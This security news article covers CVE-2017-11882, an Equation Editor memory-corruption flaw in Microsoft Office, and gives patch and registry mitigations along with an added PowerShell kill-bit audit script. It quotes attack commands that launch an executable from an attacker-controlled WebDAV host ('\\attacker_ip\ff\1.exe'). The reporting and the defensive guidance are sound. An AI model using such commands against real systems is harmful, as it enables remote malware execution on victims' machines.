
17-Year-Old MS Office Flaw Lets Hackers Install Malware Without User Interaction

You should be extra careful when opening files in MS Office.

While the world is still dealing with the threat of the 'unpatched' built-in DDE feature in Microsoft Office, researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers.

The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of the Windows operating system, including the latest Microsoft Windows 10 Creators Update.

Discovered by security researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring user interaction after opening a malicious document.

The vulnerability, identified as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component responsible for the insertion and editing of equations (OLE objects) in documents.

However, due to improper memory operations, the component fails to properly handle objects in memory, corrupting it in such a way that an attacker could execute malicious code in the context of the logged-in user.

Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000 and has been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents of older versions.

DEMO: Exploitation Allows Full System Take Over

Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software.

This vulnerability could be exploited to take complete control over a system when combined with Windows kernel privilege escalation exploits (like CVE-2017-11847).

Possible Attack Scenario:

While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios, listed below:

"By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it)."

"One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker."

"Nonetheless, an attacker can use the described vulnerability to execute commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient."

"After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service."

Protection Against Microsoft Office Vulnerability

With this month's patch release, Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory.

So, users are strongly recommended to apply the November security patches as soon as possible to keep hackers and cybercriminals from taking control of their computers.

Since this component has a number of security issues that can be easily exploited, disabling it could be the best way to ensure your system's security.

Users can run the following command in the command prompt to disable registration of the component in the Windows registry:

reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

For a 32-bit Microsoft Office package on an x64 OS, run the following command instead:

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

Besides this, users should also enable Protected View (the Microsoft Office sandbox) to prevent active content execution (OLE/ActiveX/Macro).
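As an added example (not from the original article or from Embedi), the following PowerShell audits whether the Equation Editor kill-bit set by the two reg add commands above is present in both registry views, and can apply it. The CLSID and the 0x400 flag value come from the article; the function names are my own, and unlike the reg add commands the apply step ORs 0x400 into any flags already present rather than overwriting them.

```powershell
# Added example, not part of the original article: audit and optionally apply the
# Equation Editor kill-bit. CLSID and 0x400 come from the article; names are mine.
$EquationEditorClsid = '{0002CE02-0000-0000-C000-000000000046}'
$KillBit = 0x400

# Native view always; the Wow6432Node view exists only on 64-bit Windows
# (it covers 32-bit Office installed on an x64 OS).
$CompatKeys = @("HKLM:\SOFTWARE\Microsoft\Office\Common\COM Compatibility\$EquationEditorClsid")
if ([Environment]::Is64BitOperatingSystem) {
    $CompatKeys += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\$EquationEditorClsid"
}

function Get-CompatibilityFlags([string]$Key) {
    # Returns the current "Compatibility Flags" DWORD, or $null if the key or value is missing.
    if (-not (Test-Path $Key)) { return $null }
    (Get-ItemProperty -Path $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
}

function Get-EquationEditorKillBitStatus {
    # One row per registry view: current flags and whether the 0x400 bit is set.
    foreach ($key in $CompatKeys) {
        $flags = Get-CompatibilityFlags $key
        $display = if ($null -eq $flags) { 'missing' } else { '0x{0:X}' -f $flags }
        [pscustomobject]@{
            Key        = $key
            Flags      = $display
            KillBitSet = ($null -ne $flags) -and (($flags -band $KillBit) -eq $KillBit)
        }
    }
}

function Set-EquationEditorKillBit {
    # Same effect as the reg add commands above, but ORs 0x400 into existing flags
    # instead of overwriting them. Needs an elevated prompt because it writes HKLM.
    foreach ($key in $CompatKeys) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        $newValue = [int](Get-CompatibilityFlags $key) -bor $KillBit
        New-ItemProperty -Path $key -Name 'Compatibility Flags' -PropertyType DWord `
            -Value $newValue -Force | Out-Null
    }
}

# Audit first; call Set-EquationEditorKillBit from an elevated prompt to apply.
Get-EquationEditorKillBitStatus | Format-Table -AutoSize
```

Re-run Get-EquationEditorKillBitStatus after applying to confirm KillBitSet reads True for every view listed.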